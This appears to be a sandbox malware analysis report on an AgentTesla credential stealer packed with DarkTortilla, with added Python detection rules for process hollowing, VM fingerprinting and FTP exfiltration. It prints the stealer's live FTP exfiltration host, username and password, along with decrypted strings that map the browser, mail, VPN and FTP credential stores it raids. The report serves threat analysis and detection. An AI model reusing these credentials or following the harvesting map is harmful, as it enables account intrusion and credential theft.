Windows Analysis Report
tTXQS6DONV.exe

Overview

General Information

Sample name: tTXQS6DONV.exe (renamed because the original name is a hash value)
Original sample name: 5b79bb5c716c9797e048785965be3c3a54a73a587d23d0027130cb31b618e124.exe
Analysis ID: 1569277
MD5: 2788e0e233dfa0671c63179549ad16ed
SHA1: d9edf6671d0e7abf960a1c5dc8c6a126ec8f2c23
SHA256: 5b79bb5c716c9797e048785965be3c3a54a73a587d23d0027130cb31b618e124
Tags: DarkTortilla, exe, user-adrian__luca

Detection

Malware families: AgentTesla, DarkTortilla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign process
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • tTXQS6DONV.exe (PID: 7036 cmdline: "C:\Users\user\Desktop\tTXQS6DONV.exe" MD5: 2788E0E233DFA0671C63179549AD16ED)
    • InstallUtil.exe (PID: 3840 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
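The process tree above shows the sample spawning an argument-less InstallUtil.exe, which the signature list ties to "Creates a process in suspended mode" and "Injects a PE file into a foreign process", and the sample querying Win32_Bios, Win32_BaseBoard, Win32_Processor and Win32_NetworkAdapter through WMI to fingerprint the machine. The following Python turns those two observations into host triage rules. It is an added example, not code from the Joe Sandbox report: the event records are constructed to mirror the report's process tree and signature names (only the two PIDs and image paths of the malicious processes are taken from the report), and the Sysmon-like field names (`image`, `cmdline`, `ppid`, `query`) are assumed.

```python
"""Two triage rules over Sysmon-style host telemetry (added example, not report code)."""
import re
from collections import defaultdict

# Constructed events modelled on the report's process tree and WMI signatures.
# They are not telemetry exported from the sandbox run: PIDs 7036/3840 and the two
# image paths are copied from the report, everything else is assumed.
EVENTS = [
    {"type": "process_create", "pid": 7036, "ppid": 4444,
     "image": r"C:\Users\user\Desktop\tTXQS6DONV.exe",
     "cmdline": r'"C:\Users\user\Desktop\tTXQS6DONV.exe"'},
    {"type": "process_create", "pid": 3840, "ppid": 7036,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"'},
    {"type": "wmi_query", "pid": 7036, "query": "SELECT * FROM Win32_Bios"},
    {"type": "wmi_query", "pid": 7036, "query": "SELECT * FROM Win32_BaseBoard"},
    {"type": "wmi_query", "pid": 7036, "query": "SELECT * FROM Win32_Processor"},
    {"type": "wmi_query", "pid": 7036, "query": "SELECT * FROM Win32_NetworkAdapter"},
    # Benign control: a vendor installer under Program Files registering a service
    # assembly, which is what InstallUtil.exe exists for.
    {"type": "process_create", "pid": 4000, "ppid": 1000,
     "image": r"C:\Program Files\Vendor\setup.exe",
     "cmdline": r'"C:\Program Files\Vendor\setup.exe" /quiet'},
    {"type": "process_create", "pid": 5000, "ppid": 4000,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": r'InstallUtil.exe "C:\Program Files\Vendor\svc.exe"'},
]

# Directories an unprivileged user can write to; a parent living here is suspicious.
USER_WRITABLE = re.compile(r"^[a-z]:\\(users|programdata|temp)\\", re.I)
# WMI classes the report's signatures flag as VM-fingerprinting sources.
VM_CLASSES = {"win32_bios", "win32_baseboard", "win32_processor", "win32_networkadapter"}


def split_args(cmdline):
    """Tokenise a Windows command line, keeping quoted paths as single tokens."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def hollowed_installutil(events):
    """PIDs of InstallUtil.exe launched with no assembly argument by a parent that
    lives in a user-writable directory. Legitimate use always names an assembly,
    so an argument-less launch only makes sense as a hollowing host."""
    procs = {e["pid"]: e for e in events if e["type"] == "process_create"}
    hits = []
    for proc in procs.values():
        if not proc["image"].lower().endswith("\\installutil.exe"):
            continue
        parent = procs.get(proc["ppid"])
        if parent is None or not USER_WRITABLE.match(parent["image"]):
            continue
        if len(split_args(proc["cmdline"])) == 1:
            hits.append(proc["pid"])
    return hits


def vm_fingerprinting(events, threshold=3):
    """PIDs that query at least `threshold` distinct hardware classes via WMI."""
    classes = defaultdict(set)
    for e in events:
        if e["type"] != "wmi_query":
            continue
        m = re.search(r"\bfrom\s+(win32_\w+)", e["query"], re.I)
        if m and m.group(1).lower() in VM_CLASSES:
            classes[e["pid"]].add(m.group(1).lower())
    return sorted(pid for pid, seen in classes.items() if len(seen) >= threshold)


if __name__ == "__main__":
    print("InstallUtil hollowing candidates:", hollowed_installutil(EVENTS))
    print("VM fingerprinting candidates:", vm_fingerprinting(EVENTS))
```

Both rules are deliberately narrow: the first requires all three conditions (InstallUtil image, parent in a user-writable path, no assembly argument) so a vendor installer that genuinely registers a service is not flagged, and the second counts distinct classes per process rather than raw query volume, since a single Win32_Processor query is routine while Bios, BaseBoard, Processor and NetworkAdapter together in one process is the fingerprinting pattern the report describes.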
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}
PCAP (Network Traffic)
Source: dump.pcap | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security

Memory Dumps
Source: 00000001.00000002.2892478097.0000000005070000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_DarkTortilla | Description: Yara detected DarkTortilla Crypter | Author: Joe Security
Source: 00000005.00000002.3406296559.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_DarkTortilla | Description: Yara detected DarkTortilla Crypter | Author: Joe Security
Source: 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000001.00000002.2888881438.0000000003B0E000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
[11 entries collapsed in the original report]

Unpacked PEs
Source: 1.2.tTXQS6DONV.exe.3bdf172.3.unpack | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 1.2.tTXQS6DONV.exe.3b8bbf2.4.unpack | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 1.2.tTXQS6DONV.exe.3b62122.1.unpack | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 1.2.tTXQS6DONV.exe.3c09450.0.unpack | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 1.2.tTXQS6DONV.exe.3b8bbf2.4.raw.unpack | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
[12 entries collapsed in the original report]
                        No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol
2024-12-05T17:15:13.897832+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.6:49872 | 162.241.203.30:21 | TCP

Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol
2024-12-05T17:15:14.830894+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.6:49881 | 162.241.203.30:34513 | TCP
2024-12-05T17:15:14.951271+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.6:49881 | 162.241.203.30:34513 | TCP
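The extracted configuration names the exfil channel (FTP), the server and the login account, and the Suricata alerts show the sandbox host reaching 162.241.203.30 first on port 21 and then on port 34513, which is the shape of an FTP control connection followed by a passive-mode data connection. The following Python is an added example, not code from the Joe Sandbox report: it parses the configuration string exactly as the extractor printed it, decodes a 227 passive-mode reply, and flags the login and the upload of a timestamp-named log (the yyyy_MM_dd_HH_mm_ss plus .html/.zip naming the report's decrypted strings show) in an FTP control exchange. The session is constructed, and the mapping of the configured host to 162.241.203.30 is inferred from the alerts rather than stated by the report.

```python
"""From the extracted AgentTesla config to FTP exfil detection (added example, not report code)."""
import json
import re
from urllib.parse import urlparse

# The configuration string exactly as the report's Malware Configuration Extractor printed it.
CONFIG_JSON = ('{"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", '
               '"Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}')

# Upload names built from the report's decrypted strings: yyyy_MM_dd_HH_mm_ss + .html or .zip.
LOG_NAME = re.compile(r"^\d{4}_\d{2}_\d{2}_\d{2}_\d{2}_\d{2}\.(html|zip)$")
# Host/port tuple inside a 227 "Entering Passive Mode" reply (RFC 959 format).
PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


def indicators(config_json):
    """Reduce the config to what a network sensor can match on: host, port, login name."""
    cfg = json.loads(config_json)
    if cfg.get("Exfil Mode") != "FTP":
        raise ValueError("not an FTP exfil configuration")
    url = urlparse(cfg["Host"])
    return {"host": url.hostname, "port": url.port or 21, "user": cfg["Username"]}


def parse_pasv(reply):
    """Decode a 227 reply: (h1,h2,h3,h4,p1,p2) -> ('h1.h2.h3.h4', p1*256+p2), else None."""
    m = PASV_RE.search(reply)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = map(int, m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def match_ftp_session(lines, ioc):
    """Walk an FTP control channel given as (direction, text) pairs, 'C' for client
    and 'S' for server, and return the exfil indicators seen, in order."""
    findings = []
    for direction, text in lines:
        verb, _, arg = text.partition(" ")
        if direction == "C" and verb.upper() == "USER" and arg == ioc["user"]:
            findings.append(("login-as-exfil-account", arg))
        elif direction == "C" and verb.upper() == "STOR" and LOG_NAME.match(arg.rsplit("/", 1)[-1]):
            findings.append(("timestamped-log-upload", arg))
        elif direction == "S" and verb == "227":
            endpoint = parse_pasv(text)
            if endpoint:
                # The data connection the client will open next; this is the second
                # destination port a sensor sees, not port 21.
                findings.append(("passive-data-channel", "%s:%d" % endpoint))
    return findings


# Constructed control-channel exchange, not the report's dump.pcap. The passive-mode
# reply is chosen so the data endpoint equals the second Suricata alert's destination
# (162.241.203.30:34513); that the real session negotiated it this way is an assumption.
SESSION = [
    ("S", "220 FTP Server ready."),
    ("C", "USER logsftp@aminhacorretora.com.br"),
    ("S", "331 Password required"),
    ("C", "PASS _yA=,M5*J?KH"),
    ("S", "230 Login successful"),
    ("C", "PASV"),
    ("S", "227 Entering Passive Mode (162,241,203,30,134,209)."),
    ("C", "STOR 2024_12_05_17_15_13.html"),
    ("S", "226 Transfer complete"),
]

if __name__ == "__main__":
    ioc = indicators(CONFIG_JSON)
    for finding in match_ftp_session(SESSION, ioc):
        print(*finding)
```

The USER match is the highest-confidence indicator because the login name is unique to this operator's drop server, whereas the timestamp-named STOR is a family-level pattern that will also fire on other AgentTesla builds using FTP exfil. Decoding the 227 reply matters for correlation: the data transfer lands on a high port (34513 here) that no port-based rule covers, so tying it back to the control session is what lets the two alert rows in the table be read as one exfil event.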


                        AV Detection

Source: tTXQS6DONV.exe | Avira: detected
Source: http://ftp.aminhacorretora.com.br | Avira URL Cloud: Label: malware
Source: http://aminhacorretora.com.br | Avira URL Cloud: Label: malware
Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}
Source: tTXQS6DONV.exe | ReversingLabs: Detection: 68%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: tTXQS6DONV.exe | Joe Sandbox ML: detected
Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpack | String decryptor (one decrypted string per line, in the order the report lists them):
  /log.tmp
  yyyy_MM_dd_HH_mm_ss
  .html
  <html>
  </html>
  yyyy_MM_dd_HH_mm_ss
  .html
  <html>
  </html>
  <br>[
  yyyy-MM-dd HH:mm:ss
  ]<br>
  <br>
  yyyy_MM_dd_HH_mm_ss
  .html
  yyyy_MM_dd_HH_mm_ss
  .zip
  Time:
  MM/dd/yyyy HH:mm:ss
  <br>User Name:
  <br>Computer Name:
  <br>OSFullName:
  <br>CPU:
  <br>RAM:
  <br>
  IP Address:
  <br>
  <hr>
  New
  MM/dd/yyyy HH:mm:ss
  IP Address:
  false
  Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  false
  false
  false
  false
  true
  false
  ftp://ftp.aminhacorretora.com.br
  logsftp@aminhacorretora.com.br
  _yA=,M5*J?KH
  false
  false
  appdata
  XVWmeW
  XVWmeW.exe
  XVWmeW
  Type
  <br>
  <hr>
  <br>
  <b>[
  ]</b> (
  )<br>
  {BACK}
  {ALT+TAB}
  {ALT+F4}
  {TAB}
  {ESC}
  {Win}
  {CAPSLOCK}
  {KEYUP}
  {KEYDOWN}
  {KEYLEFT}
  {KEYRIGHT}
  {DEL}
  {END}
  {HOME}
  {Insert}
  {NumLock}
  {PageDown}
  {PageUp}
  {ENTER}
  {F1}
  {F2}
  {F3}
  {F4}
  {F5}
  {F6}
  {F7}
  {F8}
  {F9}
  {F10}
  {F11}
  {F12}
  control
  {CTRL}
  &amp;
  &lt;
  &gt;
  &quot;
  <br><hr>Copied Text: <br>
  <hr>
  logins
  IE/Edge
  2F1A6504-0641-44CF-8BB5-3612D865F2E5
  Windows Secure Note
  3CCD5499-87A8-4B10-A215-608888DD3B55
  Windows Web Password Credential
  154E23D0-C644-4E6F-8CE6-5069272F999F
  Windows Credential Picker Protector
  4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  Web Credentials
  77BC582B-F0A6-4E15-4E80-61736B6F3B29
  Windows Credentials
  E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  Windows Domain Certificate Credential
  3E0E35BE-1B77-43E7-B873-AED901B6275B
  Windows Domain Password Credential
  3C886FF3-2669-4AA2-A8FB-3F6759A77548
  Windows Extended Credential
  00000000-0000-0000-0000-000000000000
  SchemaId
  pResourceElement
  pIdentityElement
  pPackageSid
  pAuthenticatorElement
  IE/Edge
  UC Browser
  UCBrowser\
  Login Data
  journal
  wow_logins
  Safari for Windows
  \Common Files\Apple\Apple Application Support\plutil.exe
  \Apple Computer\Preferences\keychain.plist
  <array>
  <dict>
  <string>
  </string>
  <string>
  </string>
  <data>
  </data>
  -convert xml1 -s -o "
  \fixed_keychain.xml"
  \Microsoft\Credentials\
  \Microsoft\Credentials\
  \Microsoft\Credentials\
  \Microsoft\Credentials\
  \Microsoft\Protect\
  credential
  QQ Browser
  Tencent\QQBrowser\User Data
  \Default\EncryptedStorage
  Profile
  \EncryptedStorage
  entries
  category
  Password
  str3
  str2
  blob0
  password_value
  IncrediMail
  PopPassword
  SmtpPassword
  Software\IncrediMail\Identities\
  \Accounts_New
  PopPassword
  SmtpPassword
  SmtpServer
  EmailAddress
  Eudora
  Software\Qualcomm\Eudora\CommandLine\
  current
  Settings
  SavePasswordText
  Settings
  ReturnAddress
  Falkon Browser
  \falkon\profiles\
  profiles.ini
  startProfile=([A-z0-9\/\.\"]+)
  profiles.ini
  \browsedata.db
  autofill
  ClawsMail
  \Claws-mail
  \clawsrc
  \clawsrc
  passkey0
  master_passphrase_salt=(.+)
  master_passphrase_pbkdf2_rounds=(.+)
  \accountrc
  smtp_server
  address
  account
  \passwordstorerc
  {(.*),(.*)}(.*)
  Flock Browser
  APPDATA
  \Flock\Browser\
  signons3.txt
  DynDns
  ALLUSERSPROFILE
  Dyn\Updater\config.dyndns
  username=
  password=
  https://account.dyn.com/
  t6KzXhCh
  ALLUSERSPROFILE
  Dyn\Updater\daemon.cfg
  global
  accounts
  account.
  username
  account.
  password
  Psi/Psi+
  name
  password
  Psi/Psi+
  APPDATA
  \Psi\profiles
  APPDATA
  \Psi+\profiles
  \accounts.xml
  \accounts.xml
  OpenVPN
  Software\OpenVPN-GUI\configs
  Software\OpenVPN-GUI\configs
  Software\OpenVPN-GUI\configs\
  username
  auth-data
  entropy
  USERPROFILE
  \OpenVPN\config\
  remote
  remote
  NordVPN
  NordVPN
  NordVpn.exe*
  user.config
  //setting[@name='Username']/value
  //setting[@name='Password']/value
  NordVPN
  Private Internet Access
  %ProgramW6432%
  Private Internet Access\data
  ProgramFiles(x86)
  \Private Internet Access\data
  \account.json
  .*"username":"(.*?)"
  .*"password":"(.*?)"
  Private Internet Access
  privateinternetaccess.com
  FileZilla
  APPDATA
  \FileZilla\recentservers.xml
  APPDATA
  \FileZilla\recentservers.xml
  <Server>
  <Host>
  <Host>
  </Host>
  <Port>
  </Port>
  <User>
  <User>
  </User>
  <Pass encoding="base64">
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <Pass encoding="base64">
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </Pass>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <Pass>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <Pass encoding="base64">
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </Pass>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: CoreFTP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: User
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Host
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Port
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: WinSCP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HostName
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UserName
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PublicKeyFile
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PortNumber
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: WinSCP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ABCDEF
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Flash FXP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: port
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: user
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pass
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: quick.dat
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Sites.dat
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \FlashFXP\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \FlashFXP\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FTP Navigator
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SystemDrive
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: No Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: User
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SmartFTP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: APPDATA
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: WS_FTP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: appdata
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HOST
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PWD=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PWD=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FtpCommander
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SystemDrive
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SystemDrive
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SystemDrive
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;Password=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;User=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;Server=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;Port=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;Port=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;Password=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;User=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;Anonymous=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FTPGetter
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_ip>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_ip>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </server_ip>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_port>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </server_port>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_user_name>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_user_name>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </server_user_name>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_user_password>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_user_password>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </server_user_password>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FTPGetter
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: The Bat!
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: appdata
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \The Bat!
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Account.CFN
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Account.CFN
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Becky!
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: DataDir
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Folder.lst
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Mailbox.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Account
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PassWd
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Account
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SMTPServer
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Account
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: MailAddress
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Becky!
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Outlook
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
